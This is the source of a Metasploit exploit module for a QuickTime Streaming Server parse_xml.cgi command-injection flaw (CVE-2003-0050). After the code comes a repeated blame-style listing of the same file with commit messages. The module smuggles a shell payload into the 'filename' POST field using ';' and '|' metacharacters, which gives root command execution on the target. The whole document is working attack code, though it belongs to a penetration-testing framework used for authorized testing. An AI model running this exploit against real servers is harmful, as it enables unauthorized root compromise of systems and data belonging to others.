metasploit-framework/modules/exploits/unix/webapp/qtss_parse_xml_exec.rb

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'QuickTime Streaming Server parse_xml.cgi Remote Execution',
			'Description'    => %q{
					The QuickTime Streaming Server contains a CGI script that is vulnerable
				to metacharacter injection, allow arbitrary commands to be executed as root.
				},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'OSVDB', '10562'],
					[ 'BID', '6954' ],
					[ 'CVE', '2003-0050' ]
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Space'       => 512,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl bash telnet',
						}
				},
			'Platform'       => 'unix',
			'Arch'           => ARCH_CMD,
			'Targets'        => [[ 'Automatic', { }]],
			'DefaultTarget' => 0
			))

		register_options([
			Opt::RPORT(1220)
		], self.class)
	end

	def exploit

		print_status("Sending post request with embedded command...")

		data = "filename=" + Rex::Text.uri_encode(";#{payload.encoded}|")

		response = send_request_raw({
			'uri'	  => "/parse_xml.cgi",
			'method'  => 'POST',
			'data'    => data,
			'headers' =>
			{
				'Content-Type'	 => 'application/x-www-form-urlencoded',
				'Content-Length' => data.length,
			}
		}, 3)

		# If the upload worked, the server tries to redirect us to some info
		# about the file we just saved
		if response and response.code != 200
			print_error("Server returned non-200 status code (#{response.code})")
		end

		handler
	end
end
Adds coverage for the QTSS metachar injection bug git-svn-id: file:///home/svn/framework3/trunk@7772 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-09 13:23:59 +00:00			`##`
			`# $Id$`
			`##`

			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# Framework web site for more information on licensing and terms of use.`
			`# http://metasploit.com/framework/`
			`##`


			`require 'msf/core'`


			`class Metasploit3 < Msf::Exploit::Remote`
			`Rank = ExcellentRanking`

			`include Msf::Exploit::Remote::HttpClient`

			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'QuickTime Streaming Server parse_xml.cgi Remote Execution',`
			`'Description' => %q{`
			`The QuickTime Streaming Server contains a CGI script that is vulnerable`
			`to metacharacter injection, allow arbitrary commands to be executed as root.`
			`},`
			`'Author' => [ 'hdm' ],`
			`'License' => MSF_LICENSE,`
			`'Version' => '$Revision$',`
			`'References' =>`
			`[`
			`[ 'OSVDB', '10562'],`
			`[ 'BID', '6954' ],`
			`[ 'CVE', '2003-0050' ]`
			`],`
			`'Privileged' => true,`
			`'Payload' =>`
			`{`
			`'DisableNops' => true,`
			`'Space' => 512,`
			`'Compat' =>`
			`{`
			`'PayloadType' => 'cmd',`
No ruby access on the common target git-svn-id: file:///home/svn/framework3/trunk@7776 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-09 15:13:35 +00:00			`'RequiredCmd' => 'generic perl bash telnet',`
Adds coverage for the QTSS metachar injection bug git-svn-id: file:///home/svn/framework3/trunk@7772 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-09 13:23:59 +00:00			`}`
			`},`
			`'Platform' => 'unix',`
			`'Arch' => ARCH_CMD,`
			`'Targets' => [[ 'Automatic', { }]],`
			`'DefaultTarget' => 0`
			`))`

			`register_options([`
			`Opt::RPORT(1220)`
			`], self.class)`
			`end`

			`def exploit`

			`print_status("Sending post request with embedded command...")`

			`data = "filename=" + Rex::Text.uri_encode(";#{payload.encoded}\|")`

			`response = send_request_raw({`
			`'uri' => "/parse_xml.cgi",`
			`'method' => 'POST',`
			`'data' => data,`
			`'headers' =>`
			`{`
			`'Content-Type' => 'application/x-www-form-urlencoded',`
			`'Content-Length' => data.length,`
			`}`
			`}, 3)`

			`# If the upload worked, the server tries to redirect us to some info`
			`# about the file we just saved`
			`if response and response.code != 200`
			`print_error("Server returned non-200 status code (#{response.code})")`
			`end`

			`handler`
			`end`
			`end`